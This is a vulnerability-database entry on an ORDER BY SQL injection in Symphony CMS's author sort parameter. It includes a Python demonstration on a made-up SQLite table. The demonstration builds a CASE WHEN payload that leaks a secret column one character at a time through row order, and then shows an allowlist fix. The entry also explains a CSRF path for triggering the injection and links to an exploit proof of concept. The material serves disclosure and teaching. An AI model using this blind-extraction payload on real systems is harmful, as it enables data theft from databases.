Description
SQL injection vulnerability in Symphony CMS before 2.3.2 allows remote authenticated users to execute arbitrary SQL commands via the sort parameter to system/authors/. NOTE: because the injected value travels in an ordinary request parameter, the authentication requirement can be bypassed through CSRF: an attacker who induces a logged-in user to load a crafted request can execute arbitrary SQL commands without credentials.
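The bug class above is ORDER BY injection: a user-supplied sort key is concatenated into the query because column names cannot be bound as prepared-statement parameters. The following is an added illustration, not Symphony's code and not the exploit-db proof of concept. It uses an in-memory SQLite table with constructed data; the table name, columns, and the function names list_authors_vulnerable, list_authors_safe and oracle are assumptions made for the example. It shows how an attacker-controlled sort expression turns row order into a one-bit oracle that leaks data from another column, and the allowlist-based version that rejects the same input.

```python
import sqlite3

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db():
    # Constructed sample data standing in for a CMS author table.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE authors (id INTEGER PRIMARY KEY, username TEXT, secret TEXT)"
    )
    db.executemany(
        "INSERT INTO authors VALUES (?, ?, ?)",
        [(1, "carol", "s3cret"), (2, "alice", "hunter2"), (3, "bob", "qwerty")],
    )
    return db


def list_authors_vulnerable(db, sort):
    # Vulnerable pattern: the sort value is concatenated straight into ORDER BY.
    # Binding it as a parameter would not help either: ORDER BY ? sorts by a
    # constant string, not by the named column, so code like this is common.
    query = "SELECT id, username FROM authors ORDER BY " + sort
    return [row[1] for row in db.execute(query)]


# Hardened pattern: map the caller's value onto an allowlist of real column
# names and directions, and refuse anything else.
ALLOWED_SORT = {"id": "id", "username": "username"}
ALLOWED_DIR = {"asc": "ASC", "desc": "DESC"}


def list_authors_safe(db, sort, direction="asc"):
    try:
        column = ALLOWED_SORT[sort]
        order = ALLOWED_DIR[direction.lower()]
    except KeyError:
        raise ValueError("unsupported sort parameter")
    query = f"SELECT id, username FROM authors ORDER BY {column} {order}"
    return [row[1] for row in db.execute(query)]


def oracle(db, condition):
    # Boolean-based extraction through ORDER BY: if `condition` is true the
    # rows are sorted by username (alice first), otherwise by id (carol first).
    # The first row returned therefore answers one yes/no question.
    payload = f"(CASE WHEN ({condition}) THEN username ELSE id END)"
    return list_authors_vulnerable(db, payload)[0] == "alice"


def extract_secret_first_char(db):
    # Recover the first character of author 1's secret column using only the
    # row order as feedback, one candidate character per request.
    for ch in ALPHABET:
        cond = f"(SELECT substr(secret,1,1) FROM authors WHERE id=1) = '{ch}'"
        if oracle(db, cond):
            return ch
    return None


def safe_rejects(db, payload):
    # The allowlisted version never lets the payload reach the SQL string.
    try:
        list_authors_safe(db, payload)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("normal sort:", list_authors_vulnerable(db, "username"))
    print("leaked first char of secret:", extract_secret_first_char(db))
    print("allowlist rejects payload:", safe_rejects(db, "(CASE WHEN 1=1 THEN username ELSE id END)"))
```

The same payload delivered in the sort parameter of a request that a logged-in user is tricked into sending is the CSRF path the description refers to; the allowlist removes the injection regardless of who sends the request, and a CSRF token on the endpoint is a separate, additional control.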
Exploits (1)
exploitdb: working PoC, verified, by High-Tech Bridge (tags: text, webapps, php)
https://www.exploit-db.com/exploits/38417
References (6)
Third Party Advisory, VDB Entry (x_refsource_xf): https://exchange.xforce.ibmcloud.com/vulnerabilities/83227
Exploit, mailing list (x_refsource_bugtraq): http://archives.neohapsis.com/archives/bugtraq/2013-04/0018.html
Exploit (x_refsource_misc): https://www.htbridge.com/advisory/HTB23148
Third Party Advisory, VDB Entry (x_refsource_bid): http://www.securityfocus.com/bid/58843
Exploit, Patch (x_refsource_confirm): https://github.com/symphonycms/symphony-2/commit/6c8aa4e9c810994f7632837487426867ce50f468
Patch (x_refsource_confirm): http://www.getsymphony.com/download/releases/version/2.3.2
Scores
EPSS: 0.0115 (78.6th percentile)
Details
CWE: CWE-89 (SQL injection)
Status: published
Products (10)
getsymphony/symphony: 2.0, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.1.0, 2.1.1, 2.3, < 2.3.1
Published: Mar 27, 2014
Tracked Since: Feb 18, 2026